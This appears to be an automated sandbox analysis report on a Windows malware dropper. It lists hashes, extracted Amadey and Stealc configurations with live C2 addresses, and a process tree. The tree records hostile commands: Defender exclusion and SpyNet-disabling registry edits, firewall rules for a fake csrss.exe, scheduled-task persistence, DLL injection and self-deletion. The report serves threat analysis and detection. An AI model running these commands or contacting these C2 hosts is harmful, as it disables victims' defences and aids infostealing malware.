Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    23-03-2024 00:27

General

  • Target

    2d29f6172ced07b81289c162cdd091d19627b979b07b110d2ea609e1cf78ab6c.exe

  • Size

    1.8MB

  • MD5

    8b8a78bcc4ba4e3730807036607c336c

  • SHA1

    2111f8a943159e9167c597071f40a3dd5ab5f9bd

  • SHA256

    2d29f6172ced07b81289c162cdd091d19627b979b07b110d2ea609e1cf78ab6c

  • SHA512

    ca0d40282576ea55292c8e3b514207ee233691cbc3679619c30c8e91af39ccf4c86c76d968e99c75d381dd90d20cf89d4a480ab431c5442a3c265088d338c740

  • SSDEEP

    49152:33auyYzLKQ4HWOtmwEZCA2+nIBAddbIyZJVH:aA3am7AA2iIPytH

Malware Config

Extracted

Family

amadey

Version

4.17

C2

http://185.215.113.32

Attributes
  • install_dir

    00c07260dc

  • install_file

    explorgu.exe

  • strings_key

    461809bd97c251ba0c0c8450c7055f1d

  • url_paths

    /yandex/index.php

rc4.plain

Extracted

Family

stealc

C2

http://185.172.128.209

Attributes
  • url_path

    /3cd2b41cbde8fc9c.php

Extracted

Family

amadey

Version

4.17

C2

http://185.215.113.32

Attributes
  • strings_key

    461809bd97c251ba0c0c8450c7055f1d

  • url_paths

    /yandex/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 2 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 13 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Blocklisted process makes network request 8 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 3 IoCs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 10 IoCs
  • Executes dropped EXE 31 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 15 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • UPX packed file 10 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 45 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 3 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 13 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 14 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2584
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:4228
    • C:\Users\Admin\AppData\Local\Temp\2d29f6172ced07b81289c162cdd091d19627b979b07b110d2ea609e1cf78ab6c.exe
      "C:\Users\Admin\AppData\Local\Temp\2d29f6172ced07b81289c162cdd091d19627b979b07b110d2ea609e1cf78ab6c.exe"
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      PID:3348
    • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
      C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:248
      • C:\Users\Admin\AppData\Local\Temp\1001018001\file300un-1.exe
        "C:\Users\Admin\AppData\Local\Temp\1001018001\file300un-1.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1452
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
          3⤵
          • Drops startup file
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4024
          • C:\Users\Admin\Pictures\KL746p2EwJ3pR4JnGQBVG1kf.exe
            "C:\Users\Admin\Pictures\KL746p2EwJ3pR4JnGQBVG1kf.exe"
            4⤵
            • Blocklisted process makes network request
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4312
            • C:\Users\Admin\AppData\Local\Temp\u3bs.0.exe
              "C:\Users\Admin\AppData\Local\Temp\u3bs.0.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:4360
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\BAAFIJKKEH.exe"
                6⤵
                  PID:5296
                  • C:\Users\Admin\AppData\Local\Temp\BAAFIJKKEH.exe
                    "C:\Users\Admin\AppData\Local\Temp\BAAFIJKKEH.exe"
                    7⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5384
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\BAAFIJKKEH.exe
                      8⤵
                        PID:5828
                        • C:\Windows\SysWOW64\PING.EXE
                          ping 2.2.2.2 -n 1 -w 3000
                          9⤵
                          • Runs ping.exe
                          PID:5216
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 3304
                    6⤵
                    • Program crash
                    PID:6076
                • C:\Users\Admin\AppData\Local\Temp\u3bs.1.exe
                  "C:\Users\Admin\AppData\Local\Temp\u3bs.1.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:4060
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                    6⤵
                      PID:680
                      • C:\Windows\SysWOW64\chcp.com
                        chcp 1251
                        7⤵
                          PID:3700
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                          7⤵
                          • Creates scheduled task(s)
                          PID:2636
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 1528
                      5⤵
                      • Program crash
                      PID:3308
                  • C:\Users\Admin\Pictures\WIGvvqOLiZ1NBS5Eny2Hliq6.exe
                    "C:\Users\Admin\Pictures\WIGvvqOLiZ1NBS5Eny2Hliq6.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious use of WriteProcessMemory
                    PID:2344
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      5⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:788
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 788 -s 544
                        6⤵
                        • Program crash
                        PID:680
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 788 -s 540
                        6⤵
                        • Program crash
                        PID:2636
                  • C:\Users\Admin\Pictures\nNIidBHB3gcPSf6VkSJYuZbM.exe
                    "C:\Users\Admin\Pictures\nNIidBHB3gcPSf6VkSJYuZbM.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:3204
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1844
                    • C:\Users\Admin\Pictures\nNIidBHB3gcPSf6VkSJYuZbM.exe
                      "C:\Users\Admin\Pictures\nNIidBHB3gcPSf6VkSJYuZbM.exe"
                      5⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Checks for VirtualBox DLLs, possible anti-VM trick
                      • Drops file in Windows directory
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4756
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        6⤵
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1540
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                        6⤵
                          PID:5884
                          • C:\Windows\system32\netsh.exe
                            netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                            7⤵
                            • Modifies Windows Firewall
                            PID:5952
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          6⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5404
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          6⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5828
                    • C:\Users\Admin\Pictures\6sVshv26yZXz33hjiKONQKMD.exe
                      "C:\Users\Admin\Pictures\6sVshv26yZXz33hjiKONQKMD.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:3172
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        5⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2248
                      • C:\Users\Admin\Pictures\6sVshv26yZXz33hjiKONQKMD.exe
                        "C:\Users\Admin\Pictures\6sVshv26yZXz33hjiKONQKMD.exe"
                        5⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Checks for VirtualBox DLLs, possible anti-VM trick
                        • Drops file in Windows directory
                        PID:1772
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          6⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2916
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                          6⤵
                            PID:5932
                            • C:\Windows\system32\netsh.exe
                              netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                              7⤵
                              • Modifies Windows Firewall
                              PID:5996
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            6⤵
                            • Drops file in System32 directory
                            • Suspicious use of AdjustPrivilegeToken
                            PID:6096
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            6⤵
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:832
                          • C:\Windows\rss\csrss.exe
                            C:\Windows\rss\csrss.exe
                            6⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Manipulates WinMonFS driver.
                            • Drops file in Windows directory
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2436
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              7⤵
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5496
                            • C:\Windows\SYSTEM32\schtasks.exe
                              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                              7⤵
                              • Creates scheduled task(s)
                              PID:4976
                            • C:\Windows\SYSTEM32\schtasks.exe
                              schtasks /delete /tn ScheduledUpdate /f
                              7⤵
                                PID:1272
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                7⤵
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4164
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                7⤵
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5408
                              • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                7⤵
                                • Executes dropped EXE
                                PID:3184
                              • C:\Windows\SYSTEM32\schtasks.exe
                                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                7⤵
                                • Creates scheduled task(s)
                                PID:2560
                              • C:\Windows\windefender.exe
                                "C:\Windows\windefender.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:1604
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                  8⤵
                                    PID:4776
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                      9⤵
                                      • Launches sc.exe
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3924
                          • C:\Users\Admin\Pictures\dOKByWcBXGT4vTFFyJ2ewyLr.exe
                            "C:\Users\Admin\Pictures\dOKByWcBXGT4vTFFyJ2ewyLr.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4884
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              5⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2484
                            • C:\Users\Admin\Pictures\dOKByWcBXGT4vTFFyJ2ewyLr.exe
                              "C:\Users\Admin\Pictures\dOKByWcBXGT4vTFFyJ2ewyLr.exe"
                              5⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Checks for VirtualBox DLLs, possible anti-VM trick
                              • Drops file in Windows directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1956
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                6⤵
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2476
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                6⤵
                                  PID:5812
                                  • C:\Windows\system32\netsh.exe
                                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                    7⤵
                                    • Modifies Windows Firewall
                                    PID:5852
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -nologo -noprofile
                                  6⤵
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:6056
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -nologo -noprofile
                                  6⤵
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3592
                            • C:\Users\Admin\Pictures\LsoMTdqBKzfooG01dxcUAhcY.exe
                              "C:\Users\Admin\Pictures\LsoMTdqBKzfooG01dxcUAhcY.exe"
                              4⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Checks whether UAC is enabled
                              • Drops file in System32 directory
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:1984
                            • C:\Users\Admin\Pictures\b2gMRkczgaag78wae7PZ2Nm5.exe
                              "C:\Users\Admin\Pictures\b2gMRkczgaag78wae7PZ2Nm5.exe" --silent --allusers=0
                              4⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Enumerates connected drives
                              • Modifies system certificate store
                              PID:1484
                              • C:\Users\Admin\Pictures\b2gMRkczgaag78wae7PZ2Nm5.exe
                                C:\Users\Admin\Pictures\b2gMRkczgaag78wae7PZ2Nm5.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.40 --initial-client-data=0x300,0x304,0x308,0x2dc,0x30c,0x6e3d21f8,0x6e3d2204,0x6e3d2210
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:3600
                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\b2gMRkczgaag78wae7PZ2Nm5.exe
                                "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\b2gMRkczgaag78wae7PZ2Nm5.exe" --version
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:744
                              • C:\Users\Admin\Pictures\b2gMRkczgaag78wae7PZ2Nm5.exe
                                "C:\Users\Admin\Pictures\b2gMRkczgaag78wae7PZ2Nm5.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1484 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240323002818" --session-guid=0004069e-0991-4867-932f-e16ba893ffd4 --server-tracking-blob=NTA0MWEzMzIxZGRhZDJkZTExYTU1NzNiZWRlNDI1OWU0NDE1ZjI5ZWExMWZmNDJjZjE0MWIxNDU3YzhjMzhhNDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjExIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMTE1MzY4NS41Nzc1IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI3NGY2ZmUzZS03NjIzLTQwOTMtOTc4Ny1jZGMxYzM3MmE5NWYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=AC05000000000000
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Enumerates connected drives
                                PID:3692
                                • C:\Users\Admin\Pictures\b2gMRkczgaag78wae7PZ2Nm5.exe
                                  C:\Users\Admin\Pictures\b2gMRkczgaag78wae7PZ2Nm5.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.40 --initial-client-data=0x30c,0x310,0x314,0x2dc,0x318,0x6d5421f8,0x6d542204,0x6d542210
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:4228
                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403230028181\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
                                "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403230028181\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
                                5⤵
                                • Executes dropped EXE
                                PID:6012
                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403230028181\assistant\assistant_installer.exe
                                "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403230028181\assistant\assistant_installer.exe" --version
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:3024
                                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403230028181\assistant\assistant_installer.exe
                                  "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403230028181\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x980040,0x98004c,0x980058
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:2288
                            • C:\Users\Admin\Pictures\kklXlGdGlNf6vB73tX8zuhIo.exe
                              "C:\Users\Admin\Pictures\kklXlGdGlNf6vB73tX8zuhIo.exe"
                              4⤵
                              • Executes dropped EXE
                              PID:2552
                              • C:\Users\Admin\AppData\Local\Temp\7zSCA16.tmp\Install.exe
                                .\Install.exe
                                5⤵
                                • Executes dropped EXE
                                PID:5192
                                • C:\Users\Admin\AppData\Local\Temp\7zSCDC0.tmp\Install.exe
                                  .\Install.exe /TdidgLsHl "385118" /S
                                  6⤵
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Drops file in System32 directory
                                  • Enumerates system info in registry
                                  PID:5372
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                    7⤵
                                      PID:5536
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                        8⤵
                                          PID:5640
                                          • \??\c:\windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                            9⤵
                                              PID:5664
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                              9⤵
                                                PID:5696
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                            7⤵
                                              PID:5556
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                8⤵
                                                  PID:5620
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                    9⤵
                                                      PID:5680
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
